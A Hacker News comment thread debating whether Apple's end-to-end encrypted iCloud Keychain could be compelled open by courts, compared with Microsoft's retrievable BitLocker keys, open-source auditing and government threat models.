Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Apple's solution is iCloud Keychain which is E2E encrypted, so would not be revealed with a court order.




What is your proof they don't have a duplicate key that also unlocks it? A firm handshake from Tim?

You should watch the whole BlackHat talk (from 2016!) from Apple's Head of Security Engineering and Architecture, but especially this part:

https://www.youtube.com/watch?v=BLGFriOKz6U&t=1993s


Lot of trust in the words that cannot be verified.

If they say they don't, and they do, then that's fraud, and they could be held liable for any damages that result. And, if word got out that they were defrauding customers, that would result in serious reputational damage to Apple (who uses their security practices as an industry differentiator) and possibly a significant customer shift away from them. They don't want that.

The government would never prosecute a company for fraud where that fraud consists of cooperating with the government after promising to a suspected criminal that they wouldn't.

That's not the scenario I was thinking of. There are other possibilities here, like providing a decryption key (even if by accident) to a criminal who's stolen a business's laptop, or if a business had made contractual promises to their customers, based on Apple's promises to them. The actions would be private (civil) ones, not criminal fraud prosecution.

Besides, Apple's lawyers aren't stupid enough to forget to carve out a law-enforcement demand exception.


Cooperating with law enforcement cannot be a fraud. Fraud is lying to get illegal gains. I think, it's legally ok to lie if the goal is to catch a criminal and help the government.

For example, in 20th century, an European manufacturer of encryption machines (Crypto AG [1]) made a backdoor at request of governments and never got punished - instead it got generous payments.

[1] https://en.wikipedia.org/wiki/Crypto_AG


Absent the source code, it's incredibly difficult to disprove when the only proof you have is good vibes.

There are many things you can't prove or disprove in this world. That's where trust and reputation comes in - to fill the uncertainty gap.


None of these really match the scenario we're discussing here. Some are typical big company stuff, some are technical edge cases, but none are "Apple lies about a fundamental security practice consistently and with malice"

Cognitive Dissonance. You already made up your mind, no evidence will change it. Any evidence you get is cast aside for one reason or another.

> "Apple lies about a fundamental security practice consistently and with malice"

Uploading passwords to the cloud should count. Also this: https://sneak.berlin/20231005/apple-operating-system-surveil...


That link you provided is a "conspiracy theory," even by the author's own admission. That article is also outdated; OCSP is as dead as a doornail (no doubt in part because it could be used for surveillance) and they fixed the cleartext transmission of hardware identifiers.

Are you expecting perfection here? Or are you just being argumentative?


> That link you provided is a "conspiracy theory," even by the author's own admission.

"Conspiracy theory" is not the same as a crazy, crackhead theory. See: Endward Snowden.

Full quote from the article:

> Mind you, this is definitionally a conspiracy theory; please don’t let the connotations of that phrase bias you, but please feel free to read this (and everything else on the internet) as critically as you wish.

> and they fixed the cleartext transmission of hardware identifiers

Have you got any links for that?

> Are you expecting perfection here? Or are you just being argumentative?

I expect basic things people should expect from a company promoting themselves as respecting privacy. And I don't expect them to be much worse than GNU/Linux in that respect (but they definitely are).


> Have you got any links for that?

It was noted at the bottom of the article as a follow up.

> I expect basic things people should expect from a company promoting themselves as respecting privacy. And I don't expect them to be much worse than GNU/Linux in that respect (but they definitely are).

The problem with the word “basic” is that it’s entirely subjective. What you consider “basic,” others consider advanced. Plus the floor has shifted over the years as threat actors have become more knowledgeable, threats more sophisticated, and technologies advanced.

Finally, the comparison to Linux doesn’t make a lot of sense. Apple provides a solution of integrated hardware, OS, and services. Linux has a much smaller scope; it’s just a kernel. If you don’t operate services, then by definition, you don’t have any transmitted data to protect. Nevertheless, if you consider the software packages that distros package alongside that kernel, I would encourage you to peruse the CVE databases to see just how many security notices have been filed against them and which remain open. It’s not all sunshine and roses over in Linux land, and never has been.


At the end of the day, it's all about how you weigh the evidence. If those examples are sufficient to tip the scales for you, that's your choice. However, Apple's overall trustworthiness--particular when it comes to protecting people's sensitive data--remains high for in the market. Even the examples you posted aren't especially pertinent to that (except for iCloud Keychain, where the complaint isn't whether Apple is securely storing it, but the fact that it got transmitted to them in the first place, and there exists some unresolved ambiguity about whether it is appropriately deleted on demand).

Apple has the number 1 marketing team in the world. They got away with PRISM and terrible security.

They are immune to reputation damage. Teens and moms don't care.


Terrible security... compared to what? Some ideal state that exists in your head, or a real-world benchmark? Do you expect them to ignore lawful orders from governments as well?

> Apple's solution is iCloud Keychain which is E2E encrypted, so would not be revealed with a court order.

Nope. For this threat model, E2E is a complete joke when both E's are controlled by the third party. Apple could be compelled by the government to insert code in the client to upload your decrypted data to another endpoint they control, and you'd never know.


That was tested in the San Bernardino shooter case. Apple stood up and the FBI backed down.

It's incredibly naive to believe apple will continue to be able to do that.

Yeah and Microsoft could insert code to upload the bitlocker keys. What's your point? Even linux could do that if they were compelled to.

> Even linux could do that if they were compelled to.

An open source project absolutely cannot do that without your consent if you build your client from the source. That's my point.


This is a wildly unrealistic viewpoint. This would assume that you somehow know the language of the client you’re building and have total knowledge over the entire codebase and can easily spot any sort of security issues or backdoors, assuming you’re using software that you yourself didn’t make (and even then).

This also completely disregards the history of vulnerability incidents like XZ Utils, the infected NPM packages of the month, and even for example CVEs that have been found to exist in Linux (a project with thousands of people working on it) for over a decade.


You're conflating two orthogonal threat models here.

Threat model A: I want to be secure against a government agency in my country using the ordinary judicial process to order engineers employed in my country to make technical modifications to products I use in order to spy on me specifically. Predicated on the (untrue in my personal case) idea that my life will be endangered if the government obtains my data.

Threat model B: I want to be secure against all nation state actors in the world who might ever try to surreptitiously backdoor any open source project that has ever existed.

I'm talking about threat model A. You're describing threat model B, and I don't disagree with you that fighting that is more or less futile.

Many open source projects are controlled by people who do not live in the US and are not US citizens. Someone in the US is completely immune to threat model A when they use those open source projects and build them directly from the source.


Wait I'm sorry do you build linux from source and review all code changes?

You missed the important part:

> For this threat model

We're talking about a hypothetical scenario where a state actor getting the information encrypted by the E2E encryption puts your life or freedom in danger.

If that's you, yes, you absolutely shouldn't trust US corporations, and you should absolutely be auditing the source code. I seriously doubt that's you though, and it's certainly not me.

The sub-title from the original forbes article (linked in the first paragraph of TFA):

> But companies like Apple and Meta set up their systems so such a privacy violation isn’t possible.

...is completely utterly false. The journalist swallowed the marketing whole.


Okay, so yes I grant your point that people where governments are the threat model should be auditing source code.

I also grant that many things are possible (where the journalist says "isn't possible").

However, what remains true is that Microsoft appears to store this data in a manner that can be retrieved through "simple" warrants and legal processes, compared to Apple where these encryption keys are stored in a manner that would require code changes to accomplish.

These are fundamentally different in a legal framework and while it doesn't make Apple the most perfect amazing company ever, it shames Microsoft for not putting in the technical work to accomplish these basic barriers to retrieving data.


> retrieved through "simple" warrants and legal processes

The fact it requires an additional engineering step is not an impediment. The courts could not care less about the implementation details.

> compared to Apple where these encryption keys are stored in a manner that would require code changes to accomplish.

That code already exists at apple: the automated CSAM reporting apple does subverts their icloud E2E encryption. I'm not saying they shouldn't be doing that, it's just proof they can and already do effectively bypass their own E2E encryption.

A pedant might say "well that code only runs on the device, so it doesn't really bypass E2E". What that misses is that the code running on the device is under the complete and sole control of apple, not the device's owner. That code can do anything apple cares to make it do (or is ordered to do) with the decrypted data, including exfiltrating it, and the owner will never know.


> The courts could not care less about the implementation details

That's not really true in practice by all public evidence

> the automated CSAM reporting apple does

Apple does not have a CSAM reporting feature that scans photo libraries, it never rolled out. They only have a feature that can blur sexual content in Messages and warn the reader before viewing.

We can argue all day about this, but yeah - I guess it's true that your phone is closed source so literally everything you do is "under the complete and sole control of Apple."

That just sends you back to the first point and we can never win an argument if we disagree about the level the government might compel a company to produce data.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: